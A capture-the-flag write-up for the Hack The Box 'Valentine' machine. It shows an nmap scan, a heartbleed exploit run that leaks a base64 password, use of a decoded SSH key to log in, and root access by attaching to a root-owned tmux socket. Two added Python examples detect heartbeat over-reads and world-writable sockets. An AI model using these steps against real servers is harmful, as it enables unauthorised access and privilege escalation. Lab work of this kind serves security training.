# Nmap 7.80 scan initiated Thu Sep 26 21:07:03 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 22,80,443 10.10.10.79
Nmap scan report for 10.10.10.79
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after: 2019-02-06T00:45:25
|_ssl-date: 2019-09-26T15:29:40+00:00; -7m54s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 - 3.5 (95%), Linux 3.0 (95%), Linux 2.6.38 - 3.0 (94%), Nokia N9 phone (Linux 2.6.32) (94%), Linux 3.2 (94%), Linux 2.6.38 - 2.6.39 (94%), Linux 2.6.39 (94%), Linux 3.5 (93%), Linux 2.6.32 - 3.10 (93%), Linux 2.6.32 - 3.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: -7m54s
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 219.71 ms 10.10.14.1
2 219.86 ms 10.10.10.79
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 26 21:07:36 2019 -- 1 IP address (1 host up) scanned in 33.04 seconds
As the web page signals towards the heartbleed bug, I downloaded a script and tested an exploit for heartbleed. You can download the script from the link below.
$ ./heartbleed.py 10.10.10.79
defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)
##################################################################
Connecting to: 10.10.10.79:443, 1 times
Sending Client Hello for TLSv1.0
Received Server Hello for TLSv1.0
WARNING: 10.10.10.79:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 1 of 1
##################################################################
.@....SC[...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.......0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==X.7`.....F...q9&.. =
The heartbleed.py script was dumping a base64-encoded string in the form of a $text parameter, which, when decoded, seemed like a password, i.e. heartbleedbelievethehype
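An added example, not part of the original write-up or of heartbleed.py: the RFC 6520 length rule that vulnerable OpenSSL builds skipped, written as a check over plaintext TLS records such as heartbeats sent before encryption starts. The record() helper and the sample byte strings are constructed for illustration.

```python
import struct

HEARTBEAT = 0x18      # TLS record content type 24 (RFC 6520)
MIN_PADDING = 16      # RFC 6520 requires at least 16 bytes of padding


def iter_records(stream):
    """Yield (content_type, fragment) for each complete TLS record in stream."""
    pos = 0
    while pos + 5 <= len(stream):
        ctype, _version, length = struct.unpack_from("!BHH", stream, pos)
        fragment = stream[pos + 5:pos + 5 + length]
        if len(fragment) < length:          # truncated capture: stop parsing
            return
        yield ctype, fragment
        pos += 5 + length


def check_heartbeat(fragment):
    """Classify one plaintext heartbeat message by its declared payload length."""
    if len(fragment) < 3:
        return "malformed"
    _hb_type, payload_length = struct.unpack_from("!BH", fragment, 0)
    # type(1) + length(2) + payload + padding must fit inside the record;
    # a peer that skips this test copies memory past the received message.
    if 1 + 2 + payload_length + MIN_PADDING > len(fragment):
        return "over-read"
    return "ok"


def scan(stream):
    """Return one verdict per heartbeat record found in the stream."""
    return [check_heartbeat(f) for t, f in iter_records(stream) if t == HEARTBEAT]


def record(ctype, fragment):
    """Build a TLS 1.0 record around fragment (helper for the samples below)."""
    return struct.pack("!BHH", ctype, 0x0301, len(fragment)) + fragment


# Constructed samples: a well-formed request, one declaring 64 payload bytes
# while carrying 4, and a non-heartbeat record that the scan ignores.
GOOD = record(HEARTBEAT, struct.pack("!BH", 1, 4) + b"ping" + b"\x00" * 16)
BAD = record(HEARTBEAT, struct.pack("!BH", 1, 64) + b"ping" + b"\x00" * 16)
HANDSHAKE = record(0x16, b"\x01\x00\x00\x00")

if __name__ == "__main__":
    print(scan(HANDSHAKE + GOOD + BAD))
```

RFC 6520 says a message failing this test must be discarded silently, which is what patched servers do.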
Now the next task was to find a username of some kind to test the password against the SSH service, so I ran gobuster and found the following directories, out of which /dev seemed very interesting.
hype_key seemed an interesting file; however, it was hex encoded, so after decoding it from hex, it turned out to be a private RSA key, probably for SSH. Going by the naming convention, hype_key seemed to be a key for the user hype.
We had the username, an RSA key, and a password, so let's try and connect to the server with these pieces.
$ ssh -i ./ssh.key hype@10.10.10.79
Enter passphrase for key './ssh.key':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$ id
uid=1000(hype) gid=1000(hype) groups=1000(hype),24(cdrom),30(dip),46(plugdev),124(sambashare)
hype@Valentine:~$
User own
hype@Valentine:~$ cat Desktop/user.txt
e6710***
Root own
The next part is to enumerate for potential attack vectors using the Linux Smart Enumeration script.
Out of everything, the thing that stood out the most was this list of writable files and, most importantly, the file /.devs/dev_sess.
However, I was not able to read the file, because it was a socket file, so I moved away from this and tried enumerating the history of the current user.
hype@Valentine:/.devs$ history
1 exit
2 exot
3 exit
4 ls -la
5 cd /
6 ls -la
7 cd .devs
8 ls -la
9 tmux -L dev_sess
10 tmux a -t dev_sess
11 tmux --help
12 tmux -S /.devs/dev_sess
And lo and behold, it turns out it is a tmux socket file, which we can attach to using the tmux command:
tmux -S dev_sess
And as it turns out, this session was owned by root, and now we have root access on the box.
root@Valentine:/.devs# id
uid=0(root) gid=0(root) groups=0(root)
root@Valentine:/.devs# cat /root/root.txt
f1bb6***
root@Valentine:/.devs#
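An added example, not from the original write-up: an audit that finds UNIX sockets, such as a tmux session socket, which users other than the owner can connect to. The function names and the demo's socket names and modes are assumptions made for illustration.

```python
import os
import socket
import stat
import tempfile


def find_shared_sockets(root):
    """Return (path, owner_uid, mode) for sockets writable by group or other."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:                  # os.walk lists sockets as files
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                    # vanished or unreadable: skip
            if not stat.S_ISSOCK(st.st_mode):
                continue
            # On Linux, connecting to a pathname socket needs write permission
            # on the socket file, so these bits decide who can attach.
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, st.st_uid, stat.filemode(st.st_mode)))
    return findings


def demo():
    """Constructed demo: two sockets in a temp dir, one restricted to its owner."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, mode in {"dev_sess": 0o660, "private": 0o600}.items():
            path = os.path.join(tmp, name)
            s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            s.bind(path)                    # creates the socket file
            os.chmod(path, mode)
            s.close()                       # the file stays on disk after close
        return [(os.path.basename(p), m) for p, _uid, m in find_shared_sockets(tmp)]


if __name__ == "__main__":
    for path, uid, mode in find_shared_sockets("/"):
        flag = "ROOT-OWNED" if uid == 0 else "shared"
        print(f"{flag:10} {mode} {path}")
```

A root-owned entry in the output deserves the same attention as a setuid binary; tightening the socket to mode 0600 or placing it in a 0700 directory closes the path.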
Learning Outcome
Suspicious files and basic user enumeration lead to great results, as always.